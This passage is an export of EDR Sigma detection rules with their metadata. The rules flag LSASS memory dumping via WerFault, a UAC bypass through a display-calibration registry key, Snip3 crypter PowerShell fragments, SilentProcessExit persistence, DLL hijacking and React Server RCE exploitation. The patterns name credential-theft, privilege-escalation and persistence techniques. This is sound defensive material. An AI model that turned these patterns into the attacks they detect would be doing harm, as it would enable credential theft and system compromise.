"content": "title: Possible LSASS Shtinkering Detected\nid: 13384352-88eb-420b-a83a-24445d5a52c4\ndescription: |\n Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\nreferences:\n - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/04/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n SourceImage: '*\\WerFault.exe'\n ProcessCommandLine|contains: ' -u -p * -ip * -s *'\n\n exclusion_werfault:\n SourceImage: '*\\WerFault.exe'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: 
'?:\\Windows\\System32\\lsass.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13384352-88eb-420b-a83a-24445d5a52c4",
"rule_name": "Possible LSASS Shtinkering Detected",
"rule_description": "Detects LSASS Shtinkering, a technique that consists of sending an Exception Report to the WerFault process, which will in turn dump the process's memory if the environment is correctly set up.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13754f19-10c9-40db-935a-4043b68e2ffd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092489Z",
"creation_date": "2026-03-23T11:45:34.092492Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://twitter.com/hfiref0x/status/928869933035020288"
],
"name": "t1548_002_prepare_uac_bypass_icolordataproxy.yml",
"content": "title: IColorDataProxy COM UAC Bypass Prepared\nid: 13754f19-10c9-40db-935a-4043b68e2ffd\ndescription: |\n Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://twitter.com/hfiref0x/status/928869933035020288\ndate: 2020/10/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\\DisplayCalibrator'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_legitimate:\n # Legitime value set by Windows\n Details: '%SystemRoot%\\System32\\DCCW.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13754f19-10c9-40db-935a-4043b68e2ffd",
"rule_name": "IColorDataProxy COM UAC Bypass Prepared",
"rule_description": "Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607132Z",
"creation_date": "2026-03-23T11:45:34.607135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607142Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
"https://attack.mitre.org/software/S1086/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_snip3_crypter_detected.yml",
"content": "title: Snip3 Crypter Detected\nid: 13b86531-8b7b-4ef9-bb5a-3d56f788744b\ndescription: |\n Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\n Snip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time\n - https://attack.mitre.org/software/S1086/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.execution\n - attack.t1059.001\n - attack.t1059.005\n - attack.command_and_control\n - attack.t1104\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Snip3\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Obfuscation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains|all:\n - 'Add-Type -AssemblyName Microsoft.VisualBasic'\n - '[System.Text.Encoding]::Default.GetString(@('\n - '[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath('\n - ' = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,\"|\")[0]'\n - ' [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))'\n - ' Start-Sleep -Milliseconds '\n\n selection_2:\n PowershellCommand|contains|all:\n - 'function DropToStartup() {'\n - '[System.Text.Encoding]::Default.GetString(@('\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b",
"rule_name": "Snip3 Crypter Detected",
"rule_description": "Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\nSnip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1059.005",
"attack.t1104",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14032905-0b18-4b4a-851c-3fafff461ba1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076139Z",
"creation_date": "2026-03-23T11:45:34.076141Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076146Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit",
"https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/",
"https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_using_silent_process_exit.yml",
"content": "title: Possible SilentProcessExit Registry Persistence Added\nid: 14032905-0b18-4b4a-851c-3fafff461ba1\ndescription: |\n Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\n Silent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\n Attackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\n It is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit\n - https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/\n - https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2022/09/19\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_silence_process_exit:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode'\n\n selection_image_options:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag'\n Details: 'DWORD (0x000002??)'\n\n exclusion_empty:\n Details: '(Empty)'\n\n exclusion_msiexec:\n 
ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\streem.exe\\GlobalFlag'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\BoxUI.exe\\GlobalFlag'\n\n exclusion_captureone:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CaptureOne.Win.*.tmp'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\captureone.exe\\ReportingMode'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\captureone.exe\\GlobalFlag'\n\n exclusion_ManagerAdmin:\n ProcessImage: '?:\\Program Files\\Dassault Systemes\\\\*\\win_b??\\code\\bin\\DSYSysIRManagerAdmin.exe'\n ProcessSigned: 'true'\n ProcessInternalName: 'DSYSysIRManagerAdmin.exe'\n ProcessSignature|contains: 'DASSAULT'\n\n exclusion_adobe:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Illustrator.exe\\GlobalFlag'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Adobe Inc.'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14032905-0b18-4b4a-851c-3fafff461ba1",
"rule_name": "Possible SilentProcessExit Registry Persistence Added",
"rule_description": "Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\nSilent Process Exit happens when a process is terminated gracefully, by itself or by another process. Windows allows users to trigger events in case of a Silent Process Exit.\nAttackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\nIt is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14b8dddd-67f2-4c76-b54c-d77daec6b252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627205Z",
"creation_date": "2026-03-23T11:45:34.627208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_suspicious_recycle_bin.yml",
"content": "title: Suspicious Process Executed from Recycle Bin Folder\nid: 14b8dddd-67f2-4c76-b54c-d77daec6b252\ndescription: |\n Detects a suspicious execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2025/01/28\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\n filter_deleted_file:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14b8dddd-67f2-4c76-b54c-d77daec6b252",
"rule_name": "Suspicious Process Executed from Recycle Bin Folder",
"rule_description": "Detects a suspicious execution from the Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14c2f793-59ba-4331-86c7-8146946b4943",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591425Z",
"creation_date": "2026-03-23T11:45:34.591429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591437Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msra.yml",
"content": "title: DLL Hijacking via msra.exe\nid: 14c2f793-59ba-4331-86c7-8146946b4943\ndescription: |\n Detects potential Windows DLL Hijacking via msra.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msra.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\NDFAPI.DLL'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\UxTheme.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14c2f793-59ba-4331-86c7-8146946b4943",
"rule_name": "DLL Hijacking via msra.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msra.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14c9835b-73bc-4bc6-a202-6591317a11fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082369Z",
"creation_date": "2026-03-23T11:45:34.082371Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082375Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vmnat.yml",
"content": "title: DLL Hijacking via vmnat.exe\nid: 14c9835b-73bc-4bc6-a202-6591317a11fb\ndescription: |\n Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/16\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vmnat.exe'\n ProcessSignature: 'VMware, Inc.'\n ImageLoaded|endswith: '\\shfolder.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14c9835b-73bc-4bc6-a202-6591317a11fb",
"rule_name": "DLL Hijacking via vmnat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-16",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628587Z",
"creation_date": "2026-03-23T11:45:34.628589Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628593Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_potential_react_server_rce_exploitation_linux.yml",
"content": "title: Potential React-Server RCE Exploitation (Linux)\nid: 14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80\ndescription: |\n Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/05\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2025-55182\n - classification.Linux.Exploit.React2Shell\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|startswith: 'next-server'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n 